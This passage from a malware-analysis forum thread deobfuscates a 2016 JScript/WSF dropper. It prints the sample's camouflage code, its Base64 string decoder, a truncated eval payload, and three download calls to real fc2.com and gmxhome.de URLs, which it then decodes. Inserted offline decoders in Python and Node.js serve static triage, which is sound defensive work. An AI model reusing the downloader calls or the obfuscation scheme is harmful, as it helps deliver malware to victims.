var d7 = center("00M"+"11SX"+"22ML"+("continues","oxfordshire","inconsolable","gazelle","laundry","2.")+"PIPIPKAM"+"LH"+"TT"+("survival","motif","chaotic","lotus","heritage","places","camera","emacs","P}")+"WU"+("eddie","flustered","exalt","fahrenheit","credit","classroom","trends","cr")+("unbending","ranked","avenue","durable","vestibule","ceremony","elementary","congregate","ip")+"t:S"+("mining","surmount","intimidate","between","croatia","ampland","glenn","municipality","h")+"e"+("voracious","reaper","crispin","count","effeminacy","mashed","convinced","slovak","ll"));
...
...
eval("IGZ1bmN0aW9uIHZvdGdvcm9kYXphc3Bpbm95aXB1dGtvcm.........XB1dGtvcm9oZUNDQ2NjYTsNCn07".manysecretthings());

Tetromino.prototype.getNew = function (index) { this.x = 4; index = 6; this.index = index; switch (index) { case 1: this.frameNumber = 1; this.sprite = 5; this.sprite = 1; this.frame = new Array( new Array( new Array(0, -1), new Array(0, 0), new Array(1, -1), new Array(1, 0) ) ); break; case 2:this.frameNumber = 4; this.sprite = 4; this.sprite = 2; this.frame = new Array( new Array( new Array(2, 0), new Array(-1, 0), new Array(0, 0), new Array(1, 0) ), new Array( new Array(1, -1), new Array(1, 0), new Array(1, 1), new Array(1, 2) ), new Array( new Array(2, 1), new Array(-1, 1), new Array(0, 1), new Array(1, 1) ), new Array( new Array(0, -1), new Array(0, 0), new Array(0, 1), new Array(0, 2) ) ); break; case 3:this.frameNumber = 4; this.sprite = 7; this.sprite = 3; this.frame = new Array( new Array( new Array(1, -1), new Array(0, -1), new Array(0, 0), new Array(-1, 0) ), new Array( new Array(0, -1), new Array(0, 0), new Array(1, 0), new Array(1, 1) ), new Array( new Array(1, -1), new Array(0, -1), new Array(0, 0), new Array(-1, 0) ), new Array( new Array(-1, -1), new Array(-1, 0), new Array(0, 0), new Array(0, 1) ) ); break; case 4: this.sprite = 2; this.sprite = 4; this.frameNumber = 2; this.frame = new Array( new Array( new Array(-1, -1), new Array(0, -1), new Array(0, 0), new Array(1, 0) ), new Array( new Array(0, 0), new Array(1, 0), new Array(0, 1), new Array(1, -1) ), new Array( new Array(-1, 0), new Array(0, 0), new Array(0, 1), new Array(1, 1) ), new Array( new Array(0, -1), new Array(0, 0), new Array(-1, 0), new Array(-1, 1) ) ); break; case 5:this.frameNumber = 4; this.sprite = 3; this.sprite = 5; this.frame = new Array( new Array( new Array(-1, 0), new Array(0, 0), new Array(1, 0), new Array(1, -1) ), new Array( new Array(-1, -1), new Array(0, -1), new Array(0, 0), new Array(0, 1) ), new Array( new Array(-1, 0), new Array(0, 0), new Array(1, 0), new Array(-1, 1) ), new Array( new Array(0, -1), new Array(0, 0), new Array(0, 1), new Array(1, 1) ) ); break; 
case 6: this.sprite = 1; this.sprite = 6; this.frameNumber = 4; this.frame = new Array( new Array( new Array(-1, -1), new Array(-1, 0), new Array(0, 0), new Array(1, 0) ), new Array( new Array(0, -1), new Array(-1, -1), new Array(-1, 0), new Array(-1, 1) ), new Array( new Array(-1, 0), new Array(0, 0), new Array(1, 0), new Array(1, 1) ), new Array( new Array(1, -1), new Array(1, 0), new Array(1, 1), new Array(0, 1) ) ); break; case 7: this.sprite = 6; this.sprite = 7; this.frameNumber = 4; this.frame = new Array( new Array( new Array(-1, 0), new Array(0, 0), new Array(1, 0), new Array(0, -1) ), new Array( new Array(0, -1), new Array(0, 0), new Array(0, 1), new Array(-1, 0) ), new Array( new Array(-1, 0), new Array(0, 0), new Array(1, 0), new Array(0, 1) ), new Array( new Array(0, -1), new Array(0, 0), new Array(0, 1), new Array(1, 0) ) ); break; }};
};
...
try{
Shtyler4("http://"+"\u0068e\u0072i\u006Da\u0073u"+"\u002Ew\u0065b\u002Ef\u00632\u002Ec\u006Fm\u002F0\u0039u\u0039j\u006E8\u0037" + "?AMLXoFbQSk=KGkINlTdQz","JlLQdKnWwif");
}catch(votgorodazaspinoyiputkoroheuUxUroNK){}
try{
Shtyler4("http://"+"\u00312\u0035r\u0075"+".\u0077e\u0062.\u0066c\u0032.\u0063o\u006D/\u00309\u00759\u006An\u00387" + "?yMsjsVxGF=efxMvO","bsMnCcz");
}catch(votgorodazaspinoyiputkoroheSaqWtHkKPQ){}
try{
Shtyler4("http://"+"\u0068r\u0065n\u006Ee\u0072"+".\u0067m\u0078h\u006Fm\u0065.\u0064e\u002F0\u0039u\u0039j\u006E8\u0037" + "?xBpCVMC=cLVucBgsR","FgGsqpxH");
}catch(votgorodazaspinoyiputkoroheIqjwksMIt){}
2)
Look at the end :
try{
Shtyler4("http://"+"\u0068e\u0072i\u006Da\u0073u"+"\u002Ew\u0065b\u002Ef\u00632\u002Ec\u006Fm\u002F0\u0039u\u0039j\u006E8\u0037" + "?AMLXoFbQSk=KGkINlTdQz","JlLQdKnWwif");
}catch(votgorodazaspinoyiputkoroheuUxUroNK){}
try{
Shtyler4("http://"+"\u00312\u0035r\u0075"+".\u0077e\u0062.\u0066c\u0032.\u0063o\u006D/\u00309\u00759\u006An\u00387" + "?yMsjsVxGF=efxMvO","bsMnCcz");
}catch(votgorodazaspinoyiputkoroheSaqWtHkKPQ){}
try{
Shtyler4("http://"+"\u0068r\u0065n\u006Ee\u0072"+".\u0067m\u0078h\u006Fm\u0065.\u0064e\u002F0\u0039u\u0039j\u006E8\u0037" + "?xBpCVMC=cLVucBgsR","FgGsqpxH");
}catch(votgorodazaspinoyiputkoroheIqjwksMIt){}

- Using the tool I linked in part (1) :

http://"+"herimasu"+".web.fc2.com/09u9jn87" + "?AMLXoFbQSk=KGkINlTdQz"
http://"+"125ru"+".web.fc2.com/09u9jn87" + "?yMsjsVxGF=efxMvO
http://"+"hrenner"+".gmxhome.de/09u9jn87" + "?xBpCVMC=cLVucBgsR"
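As an added example (my code, not the post's and not the sample's), here is a small Python decoder that does offline what the online tool above does, and also copes with the chars that made that tool fail on the whole .wsf in part (1): it expands the legacy octal escapes (\040, \075, \145, \066), the \u escapes used in the URL strings just above, plus \x and the simple \r \n \t \\ \" \' forms. The inputs are constructed from the fragments quoted in the post (the three lines of the part (1) example, the `QVh1 /* c\040 */(25\066)` clue, and one \u-escaped hostname label from the list above); the function and regex names are mine.

```python
import re

# Escape forms JScript accepts inside string literals. Legacy octal escapes
# are at most three digits and never exceed \377, hence the two branches.
ESCAPE_RE = re.compile(
    r'\\(?:(?P<oct>[0-3][0-7]{0,2}|[4-7][0-7]?)'   # octal: \040 \075 \145
    r'|x(?P<hex>[0-9A-Fa-f]{2})'                    # hex:   \x41
    r'|u(?P<uni>[0-9A-Fa-f]{4})'                    # unicode: \u0068
    r'|(?P<simple>[rnt\\"\']))'                     # \r \n \t \\ \" \'
)
SIMPLE = {"r": "\r", "n": "\n", "t": "\t", "\\": "\\", '"': '"', "'": "'"}


def _expand(m):
    """Turn one matched escape sequence into the character it encodes."""
    if m.group("oct") is not None:
        return chr(int(m.group("oct"), 8))
    if m.group("hex") is not None:
        return chr(int(m.group("hex"), 16))
    if m.group("uni") is not None:
        return chr(int(m.group("uni"), 16))
    return SIMPLE[m.group("simple")]


def decode_js_escapes(text):
    """Expand every escape sequence in a JS/JScript source fragment."""
    return ESCAPE_RE.sub(_expand, text)


def decoded_lines(text):
    """Decode, then split on the CRLF the samples embed as a literal \\r\\n,
    which gives one source line per list entry, as the online tool showed."""
    return decode_js_escapes(text).split("\r\n")


# Constructed inputs, copied from the fragments quoted in the post.
WSF_FRAGMENT = (r'var XIu6 = "l\145" +\040"";\r\nva\162 Ec = "oF\151\042 + "";'
                r'\r\nvar Ui = \042SaveT" + "";')
XOR_CLUE = r'QVh1 /* c\040 */(25\066);'
URL_LABEL = r'\u0068e\u0072i\u006Da\u0073u'

if __name__ == "__main__":
    for line in decoded_lines(WSF_FRAGMENT):
        print(line)
    print(decode_js_escapes(XOR_CLUE))
    print(decode_js_escapes(URL_LABEL))
```

Running the decoder over a whole script before grepping it is what makes the clues the post points at (function names, object names, hostnames) show up as plain text, which is exactly why this first obfuscation layer gives heuristics so little trouble.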

My first question when I saw this part: "Why don't they put the URLs in a way that is less easy to retrieve?!"
My second question was "are these real URLs used to download payloads?!"

The first and third URLs are blocked by KTS cloud
The second exists no more: 403

Because the very interesting part is the deobfuscation from their "chaotic" source, it made me curious and made me want to completely deobfuscate it (to see the real parts used, etc...)

3)
Let's investigate more :)

var sirdallos ="RAPAPIPATARXhwYW5RAPAPIPATAkRW52aXRAPAPIPATAJvbm1lbnRTdHJRAPAPIPATApbmdz".manysecretthings();

A lot of strange strings use the same function: manysecretthings();
=> lol, very explicit name they gave it

The most important string used this way is 8492 chars long

manysecretthings() uses char code BITWISE operations: AND, OR, SHR, SHL
and also uses an array to retrieve the right char code from the calculated values: lulalula

String.prototype.manysecretthings = function() {
var c1, c2, c3, c4;
var i, len, out;
var str = this.replace(/RAPAPIPATA/g, ''); // remove all "RAPAPIPATA" strings
len = str.length; // length of the new string
i = 0;
out = "";

while (i < len) { // Principal loop

do {

c1 = lulalula[str.charCodeAt(i++) & 0xff];
} while (i < len && c1 == -1);
if (c1 == -1)
break;

var dodo = false;

do {
c2 = lulalula[str.charCodeAt(i++) & 0xff];

dodo = i < len && c2 == -1;
} while (dodo);
if (c2 == -1)
break;
out += String.fromCharCode((c1 << 2) | ((c2 & 0x30) >> 4));
do {

c3 = str.charCodeAt(i++) & 0xff;
if (c3 == 61)
return out;

c3 = lulalula[c3];
} while (i < len && c3 == -1);
if (c3 == -1)
break;

out += String.fromCharCode(((c2 & 0XF) << 4) | ((c3 & 0x3c) >> 2));
do {

c4 = str.charCodeAt(i++) & 0xff;

if (c4 == 61)
return out;

c4 = lulalula[c4];

} while (i < len && c4 == -1);

if (c4 == -1)
break;
out += String.fromCharCode(((c3 & 0x03) << 6) | c4);
} // end of principal while

return out;
// string decrypted
};
var lulalula = new Array(4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,67,4,4,4,68,57,58,59,60,61,62,63,64,65,66,4,4,4,4,4,4,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,4,4,4,4,4,4,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4);
var lulalulaI, lulalulan = lulalula.length;
for (lulalulaI= 0; lulalulaI < lulalulan; ++lulalulaI) {
lulalula[lulalulaI] = lulalula[lulalulaI] - 5;
}
// here the real values of lulalula are in place :)

Let's test :

var VARDOCF ="JVRFTVAl".manysecretthings();
=> "%TEMP%"

var finde = "QWN0aXZlWE9iamVjdARAPAPIPATA=RAPAPIPATA=RAPAPIPATA".manysecretthings();
=> "ActiveXObject"
 
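Added example (mine, not code from the thread and not the sample's own code): a Node.js re-implementation of manysecretthings() next to a "two operations" version, plus a small static helper that pulls the encoded literals out of a script and decodes them without running anything from the sample. It assumes nothing beyond what is visible above: the lookup table is rebuilt from the Base64 alphabet rather than copied from the 256-entry lulalula array (once the 5 is subtracted, that array is exactly the standard Base64 decode table, with -1 for every byte that is not in the alphabet), and the sample script at the bottom is constructed from the strings quoted in this thread.

```javascript
// Added example, not code from the thread or from the sample: a clean
// re-implementation of what manysecretthings() does, used to check that
// the function is only "strip the RAPAPIPATA marker, then Base64-decode".
// Runs offline under Node.js (no modules needed); inputs are the strings
// quoted in the thread.

const JUNK = /RAPAPIPATA/g;

// Rebuild the sample's lookup table. In the script the array is stored with
// +5 on every entry and fixed up by a loop; once 5 is subtracted it is the
// standard Base64 decode table: 'A'-'Z' -> 0..25, 'a'-'z' -> 26..51,
// '0'-'9' -> 52..61, '+' -> 62, '/' -> 63, everything else -> -1 (skipped).
function buildDecodeTable() {
  const table = new Int16Array(256).fill(-1);
  const alphabet = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/';
  for (let k = 0; k < alphabet.length; k++) table[alphabet.charCodeAt(k)] = k;
  return table;
}
const TABLE = buildDecodeTable();

// Faithful port of the sample's decode loop (same shifts, same early return
// on '=' padding), with the noise names removed.
function manySecretThingsPort(s) {
  const str = s.replace(JUNK, '');
  const len = str.length;
  let i = 0;
  let out = '';
  while (i < len) {
    let c1, c2, c3, c4;
    do { c1 = TABLE[str.charCodeAt(i++) & 0xff]; } while (i < len && c1 === -1);
    if (c1 === -1) break;
    do { c2 = TABLE[str.charCodeAt(i++) & 0xff]; } while (i < len && c2 === -1);
    if (c2 === -1) break;
    out += String.fromCharCode((c1 << 2) | ((c2 & 0x30) >> 4));
    do {
      c3 = str.charCodeAt(i++) & 0xff;
      if (c3 === 61) return out;            // '=' : padding reached, stop
      c3 = TABLE[c3];
    } while (i < len && c3 === -1);
    if (c3 === -1) break;
    out += String.fromCharCode(((c2 & 0x0f) << 4) | ((c3 & 0x3c) >> 2));
    do {
      c4 = str.charCodeAt(i++) & 0xff;
      if (c4 === 61) return out;
      c4 = TABLE[c4];
    } while (i < len && c4 === -1);
    if (c4 === -1) break;
    out += String.fromCharCode(((c3 & 0x03) << 6) | c4);
  }
  return out;
}

// The same thing as two operations: strip the marker, Base64-decode.
// latin1 keeps one char per byte, like String.fromCharCode in the sample.
function manySecretThingsSimple(s) {
  return Buffer.from(s.replace(JUNK, ''), 'base64').toString('latin1');
}

// Static triage helper: find every "<literal>".<anything>manysecretthings()
// call in a script and decode it without executing the script. The optional
// name prefix lets it match both the raw sample (votgorodazaspinoyiputkoroheCCC
// prefix) and the simplified copy.
function decodeLiterals(scriptText) {
  const re = /"([A-Za-z0-9+\/=]*)"\.\w*manysecretthings\(\)/g;
  const found = [];
  let m;
  while ((m = re.exec(scriptText)) !== null) {
    found.push({ encoded: m[1], decoded: manySecretThingsSimple(m[1]) });
  }
  return found;
}

// True when the faithful port and the two-step version agree on every input.
function portMatchesSimple(inputs) {
  return inputs.every((s) => manySecretThingsPort(s) === manySecretThingsSimple(s));
}

// Constructed sample script: three calls lifted from the thread.
const SAMPLE_SCRIPT = [
  'var VARDOCF ="JVRFTVAl".manysecretthings();',
  'var finde = "QWN0aXZlWE9iamVjdARAPAPIPATA=RAPAPIPATA=RAPAPIPATA".manysecretthings();',
  'x = "UnRAPAPIPATAVuRAPAPIPATA".votgorodazaspinoyiputkoroheCCCmanysecretthings();',
].join('\n');

for (const { encoded, decoded } of decodeLiterals(SAMPLE_SCRIPT)) {
  console.log(encoded, '=>', JSON.stringify(decoded));
}
```

Decoding the literals statically (regex plus decode) instead of calling the sample's own function is the safer habit when triaging these droppers: it yields the same "%TEMP%", "ActiveXObject" and "Run" strings without letting any line of the sample execute, and the same helper can be pointed at the long 8492-char string to get the next layer for reading.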

DardiM

I can't edit the first post any more, so I put the third part here

(3) "4 6183943701_01-08-2016.js" (same method as "7 9329606101_01-08-2016.wsf"):


When first editing this file, the obfuscation method looks interesting.
In the spoiler, only a few parts, to give you an idea:
votgorodazaspinoyiputkoroheCCCrodmands.create = function(){
  var votgorodazaspinoyiputkoroheCCCpublisher = new votgorodazaspinoyiputkoroheCCCMBJSL.votgorodazaspinoyiputkoroheCCCPublisher();
  var votgorodazaspinoyiputkoroheCCCspyFunction1 = votgorodazaspinoyiputkoroheCCCsinon.votgorodazaspinoyiputkoroheCCCspy();
  votgorodazaspinoyiputkoroheCCCpublisher.votgorodazaspinoyiputkoroheCCCsubscribe(votgorodazaspinoyiputkoroheCCCspyFunction1, this.votgorodazaspinoyiputkoroheCCCtype1);
  votgorodazaspinoyiputkoroheCCCpublisher.votgorodazaspinoyiputkoroheCCCpublish(this.votgorodazaspinoyiputkoroheCCCtype1);
  votgorodazaspinoyiputkoroheCCCok(votgorodazaspinoyiputkoroheCCCspyFunction1.votgorodazaspinoyiputkoroheCCCcalledWith(), "Function called without arguments");
  votgorodazaspinoyiputkoroheCCCpublisher.votgorodazaspinoyiputkoroheCCCpublish(this.votgorodazaspinoyiputkoroheCCCtype1, "PROPER1");
  votgorodazaspinoyiputkoroheCCCok(votgorodazaspinoyiputkoroheCCCspyFunction1.votgorodazaspinoyiputkoroheCCCcalledWith("PROPER1"), "Function called with 'PROPER1' argument");
  votgorodazaspinoyiputkoroheCCCpublisher.votgorodazaspinoyiputkoroheCCCpublish(this.votgorodazaspinoyiputkoroheCCCtype1, ["PROPER1", "PROPER2"]);
  votgorodazaspinoyiputkoroheCCCok(votgorodazaspinoyiputkoroheCCCspyFunction1.votgorodazaspinoyiputkoroheCCCcalledWith(["PROPER1", "PROPER2"]), "Function called with 'PROPER1' and 'PROPER2' arguments");
};
votgorodazaspinoyiputkoroheCCCrodmands.votgorodazaspinoyiputkoroheCCCsubtract = function(votgorodazaspinoyiputkoroheCCCparam1, votgorodazaspinoyiputkoroheCCCparam2) {
  return new votgorodazaspinoyiputkoroheCCCrodmands(votgorodazaspinoyiputkoroheCCCparam1.x - votgorodazaspinoyiputkoroheCCCparam2.x, votgorodazaspinoyiputkoroheCCCparam1.y - votgorodazaspinoyiputkoroheCCCparam2.y);
};
var votgorodazaspinoyiputkoroheCCCqtcnthltqfqrhfq = { ':': '.','U': 'S','PIPIPKA': 'X', '00':'', '11':'', '22':''};
var votgorodazaspinoyiputkoroheCCCerrant = 0;
function votgorodazaspinoyiputkoroheCCCachievment(votgorodazaspinoyiputkoroheCCCbidttt){
  if(votgorodazaspinoyiputkoroheCCCbidttt==1){return 2;}
  else{return 17;}
  return 3;};
function votgorodazaspinoyiputkoroheCCCcenter(votgorodazaspinoyiputkoroheCCCrivulet) {
  request = votgorodazaspinoyiputkoroheCCCrivulet;
  for (var votgorodazaspinoyiputkoroheCCCi in votgorodazaspinoyiputkoroheCCCqtcnthltqfqrhfq){request = request.replace(votgorodazaspinoyiputkoroheCCCi, votgorodazaspinoyiputkoroheCCCqtcnthltqfqrhfq[votgorodazaspinoyiputkoroheCCCi]);}
  return request;
};
var votgorodazaspinoyiputkoroheCCCchosen = 33/3-10;
function votgorodazaspinoyiputkoroheCCCrodmands(x, y) {
  this.x = x + "bbfgnfgngn";
  this.y = y - "fgnfgngfgf";
};

var votgorodazaspinoyiputkoroheCCClulalula = new Array(4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,67,4,4,4,68,57,58,59,60,61,62,63,64,65,66,4,4,4,4,4,4,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,4,4,4,4,4,4,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4);

...
var votgorodazaspinoyiputkoroheCCCd7 = votgorodazaspinoyiputkoroheCCCcenter("00M"+"11SX"+"22ML"+("votgorodazaspinoyiputkoroheCCCcontinues","votgorodazaspinoyiputkoroheCCCoxfordshire","votgorodazaspinoyiputkoroheCCCinconsolable","votgorodazaspinoyiputkoroheCCCgazelle","votgorodazaspinoyiputkoroheCCClaundry","2.")+"PIPIPKAM"+"LH"+"TT"+("votgorodazaspinoyiputkoroheCCCsurvival","votgorodazaspinoyiputkoroheCCCmotif","votgorodazaspinoyiputkoroheCCCchaotic","votgorodazaspinoyiputkoroheCCClotus","votgorodazaspinoyiputkoroheCCCheritage","votgorodazaspinoyiputkoroheCCCplaces","votgorodazaspinoyiputkoroheCCCcamera","votgorodazaspinoyiputkoroheCCCemacs","P}")+"WU"+("votgorodazaspinoyiputkoroheCCCeddie","votgorodazaspinoyiputkoroheCCCflustered","votgorodazaspinoyiputkoroheCCCexalt","votgorodazaspinoyiputkoroheCCCfahrenheit","votgorodazaspinoyiputkoroheCCCcredit","votgorodazaspinoyiputkoroheCCCclassroom","votgorodazaspinoyiputkoroheCCCtrends","cr")+("votgorodazaspinoyiputkoroheCCCunbending","votgorodazaspinoyiputkoroheCCCranked","votgorodazaspinoyiputkoroheCCCavenue","votgorodazaspinoyiputkoroheCCCdurable","votgorodazaspinoyiputkoroheCCCvestibule","votgorodazaspinoyiputkoroheCCCceremony","votgorodazaspinoyiputkoroheCCCelementary","votgorodazaspinoyiputkoroheCCCcongregate","ip")+"t:S"+("votgorodazaspinoyiputkoroheCCCmining","votgorodazaspinoyiputkoroheCCCsurmount","votgorodazaspinoyiputkoroheCCCintimidate","votgorodazaspinoyiputkoroheCCCbetween","votgorodazaspinoyiputkoroheCCCcroatia","votgorodazaspinoyiputkoroheCCCampland","votgorodazaspinoyiputkoroheCCCglenn","votgorodazaspinoyiputkoroheCCCmunicipality","h")+"e"+("votgorodazaspinoyiputkoroheCCCvoracious","votgorodazaspinoyiputkoroheCCCreaper","votgorodazaspinoyiputkoroheCCCcrispin","votgorodazaspinoyiputkoroheCCCcount","votgorodazaspinoyiputkoroheCCCeffeminacy","votgorodazaspinoyiputkoroheCCCmashed","votgorodazaspinoyiputkoroheCCCconvinced","votgorodazaspinoyiputkoroheCCCslovak","ll"));
...
...
eval("IGZ1bmN0aW9uIHZvdGdvcm9kYXphc3Bpbm95aXB1dGtvcm.........XB1dGtvcm9oZUNDQ2NjYTsNCn07".votgorodazaspinoyiputkoroheCCCmanysecretthings());

...
votgorodazaspinoyiputkoroheCCCTetromino.prototype.getNew = function (index) { this.x = 4; index = 6; this.index = index; switch (index) { case 1: this.frameNumber = 1; this.sprite = 5; this.sprite = 1; this.frame = new Array( new Array( new Array(0, -1), new Array(0, 0), new Array(1, -1), new Array(1, 0) ) ); break; case 2:this.frameNumber = 4; this.sprite = 4; this.sprite = 2; this.frame = new Array( new Array( new Array(2, 0), new Array(-1, 0), new Array(0, 0), new Array(1, 0) ), new Array( new Array(1, -1), new Array(1, 0), new Array(1, 1), new Array(1, 2) ), new Array( new Array(2, 1), new Array(-1, 1), new Array(0, 1), new Array(1, 1) ), new Array( new Array(0, -1), new Array(0, 0), new Array(0, 1), new Array(0, 2) ) ); break; case 3:this.frameNumber = 4; this.sprite = 7; this.sprite = 3; this.frame = new Array( new Array( new Array(1, -1), new Array(0, -1), new Array(0, 0), new Array(-1, 0) ), new Array( new Array(0, -1), new Array(0, 0), new Array(1, 0), new Array(1, 1) ), new Array( new Array(1, -1), new Array(0, -1), new Array(0, 0), new Array(-1, 0) ), new Array( new Array(-1, -1), new Array(-1, 0), new Array(0, 0), new Array(0, 1) ) ); break; case 4: this.sprite = 2; this.sprite = 4; this.frameNumber = 2; this.frame = new Array( new Array( new Array(-1, -1), new Array(0, -1), new Array(0, 0), new Array(1, 0) ), new Array( new Array(0, 0), new Array(1, 0), new Array(0, 1), new Array(1, -1) ), new Array( new Array(-1, 0), new Array(0, 0), new Array(0, 1), new Array(1, 1) ), new Array( new Array(0, -1), new Array(0, 0), new Array(-1, 0), new Array(-1, 1) ) ); break; case 5:this.frameNumber = 4; this.sprite = 3; this.sprite = 5; this.frame = new Array( new Array( new Array(-1, 0), new Array(0, 0), new Array(1, 0), new Array(1, -1) ), new Array( new Array(-1, -1), new Array(0, -1), new Array(0, 0), new Array(0, 1) ), new Array( new Array(-1, 0), new Array(0, 0), new Array(1, 0), new Array(-1, 1) ), new Array( new Array(0, -1), new Array(0, 0), new Array(0, 
1), new Array(1, 1) ) ); break; case 6: this.sprite = 1; this.sprite = 6; this.frameNumber = 4; this.frame = new Array( new Array( new Array(-1, -1), new Array(-1, 0), new Array(0, 0), new Array(1, 0) ), new Array( new Array(0, -1), new Array(-1, -1), new Array(-1, 0), new Array(-1, 1) ), new Array( new Array(-1, 0), new Array(0, 0), new Array(1, 0), new Array(1, 1) ), new Array( new Array(1, -1), new Array(1, 0), new Array(1, 1), new Array(0, 1) ) ); break; case 7: this.sprite = 6; this.sprite = 7; this.frameNumber = 4; this.frame = new Array( new Array( new Array(-1, 0), new Array(0, 0), new Array(1, 0), new Array(0, -1) ), new Array( new Array(0, -1), new Array(0, 0), new Array(0, 1), new Array(-1, 0) ), new Array( new Array(-1, 0), new Array(0, 0), new Array(1, 0), new Array(0, 1) ), new Array( new Array(0, -1), new Array(0, 0), new Array(0, 1), new Array(1, 0) ) ); break; }};
};
...

try{
votgorodazaspinoyiputkoroheCCCShtyler4(
"http://"+"\u0068e\u0072i\u006Da\u0073u"+"\u002Ew\u0065b\u002Ef\u00632\u002Ec\u006Fm\u002F0\u0039u\u0039j\u006E8\u0037" + "?AMLXoFbQSk=KGkINlTdQz","JlLQdKnWwif");
}catch(votgorodazaspinoyiputkoroheuUxUroNK){}
try{
votgorodazaspinoyiputkoroheCCCShtyler4(
"http://"+"\u00312\u0035r\u0075"+".\u0077e\u0062.\u0066c\u0032.\u0063o\u006D/\u00309\u00759\u006An\u00387" + "?yMsjsVxGF=efxMvO","bsMnCcz");
}catch(votgorodazaspinoyiputkoroheSaqWtHkKPQ){}
try{
votgorodazaspinoyiputkoroheCCCShtyler4("http://"+"\u0068r\u0065n\u006Ee\u0072"+".\u0067m\u0078h\u006Fm\u0065.\u0064e\u002F0\u0039u\u0039j\u006E8\u0037" + "?xBpCVMC=cLVucBgsR","FgGsqpxH");
}catch(votgorodazaspinoyiputkoroheIqjwksMIt){}

Deobfuscation :

1) simplification :


First thing to do: delete all "votgorodazaspinoyiputkoroheCCC" and "votgorodazaspinoyiputkorohe" parts:

rodmands.create = function(){
  var publisher = new MBJSL.Publisher();
  var spyFunction1 = sinon.spy();
  publisher.subscribe(spyFunction1, this.type1);
  publisher.publish(this.type1);
  ok(spyFunction1.calledWith(), "Function called without arguments");
  publisher.publish(this.type1, "PROPER1");
  ok(spyFunction1.calledWith("PROPER1"), "Function called with 'PROPER1' argument");
  publisher.publish(this.type1, ["PROPER1", "PROPER2"]);
  ok(spyFunction1.calledWith(["PROPER1", "PROPER2"]), "Function called with 'PROPER1' and 'PROPER2' arguments");
};
rodmands.subtract = function(param1, param2) {
  return new rodmands(param1.x - param2.x, param1.y - param2.y);
};
var qtcnthltqfqrhfq = { ':': '.','U': 'S','PIPIPKA': 'X', '00':'', '11':'', '22':''};
var errant = 0;
function achievment(bidttt){
  if(bidttt==1){return 2;}
  else{return 17;}
  return 3;};
function center(rivulet) {
  request = rivulet;
  // substitute each key of the map (string pattern: first occurrence only)
  for (var i in qtcnthltqfqrhfq){request = request.replace(i, qtcnthltqfqrhfq[i]);}
  return request;
};
var chosen = 33/3-10;
function rodmands(x, y) {
  this.x = x + "bbfgnfgngn";
  this.y = y - "fgnfgngfgf";
};
var lulalula = new Array(4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,67,4,4,4,68,57,58,59,60,61,62,63,64,65,66,4,4,4,4,4,4,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,4,4,4,4,4,4,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4);
var d7 = center("00M"+"11SX"+"22ML"+("continues","oxfordshire","inconsolable","gazelle","laundry","2.")+"PIPIPKAM"+"LH"+"TT"+("survival","motif","chaotic","lotus","heritage","places","camera","emacs","P}")+"WU"+("eddie","flustered","exalt","fahrenheit","credit","classroom","trends","cr")+("unbending","ranked","avenue","durable","vestibule","ceremony","elementary","congregate","ip")+"t:S"+("mining","surmount","intimidate","between","croatia","ampland","glenn","municipality","h")+"e"+("voracious","reaper","crispin","count","effeminacy","mashed","convinced","slovak","ll"));
...
...
eval("IGZ1bmN0aW9uIHZvdGdvcm9kYXphc3Bpbm95aXB1dGtvcm.........XB1dGtvcm9oZUNDQ2NjYTsNCn07".manysecretthings());

